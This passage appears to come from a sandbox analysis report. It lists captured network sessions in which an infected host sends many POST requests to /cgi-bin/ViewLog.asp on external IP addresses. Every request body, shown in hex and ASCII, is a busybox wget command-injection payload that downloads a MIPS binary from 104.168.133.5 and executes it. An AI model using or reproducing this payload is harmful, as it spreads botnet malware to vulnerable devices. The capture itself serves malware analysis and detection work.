                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              433192.168.2.133646862.173.138.38080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:25.691822052 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              434192.168.2.134259031.136.44.288080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:25.839278936 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:26.406315088 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:27.526293993 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:29.894289970 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:34.502279997 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:43.462295055 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:01.894238949 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              435192.168.2.135501895.215.20.2398080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:25.892784119 CET171INHTTP/1.1 500 Server Error
                                              Content-Length: 48
                                              Date: Thu, 23 Nov 2023 04:17:25 GMT
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              436192.168.2.134746662.29.34.1968080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:25.953461885 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              437192.168.2.134422894.237.87.1018080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:28.864651918 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:29.050669909 CET200INHTTP/1.1 307 Temporary Redirect
                                              Location: /containers/
                                              Date: Thu, 23 Nov 2023 04:17:28 GMT
                                              Content-Length: 0
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              438192.168.2.135868062.134.71.1928080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:28.874674082 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              439192.168.2.134064894.121.73.1558080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:28.911020041 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              440192.168.2.133743262.150.195.1318080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:28.936955929 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:29.205890894 CET367INHTTP/1.1 403 Forbidden
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 106
                                              Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              441192.168.2.134518231.220.48.1008080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:28.974073887 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              442192.168.2.133590631.0.129.398080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:29.153045893 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              443192.168.2.134748062.29.82.1778080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:29.924913883 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              444192.168.2.135584294.187.105.458080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:31.797949076 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:32.966311932 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              445192.168.2.134444862.29.49.1948080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:31.799773932 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              446192.168.2.136069494.120.213.1098080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:31.824848890 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              447192.168.2.133753295.131.144.2428080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:32.048731089 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:32.272527933 CET148INHTTP/1.1 404 Not Found
                                              Date: Thu, 23 Nov 2023 04:17:32 GMT
                                              Connection: Close


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              448192.168.2.133661231.200.58.1798080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:32.403539896 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              449192.168.2.133557631.44.143.608080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:32.403639078 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:33.638297081 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
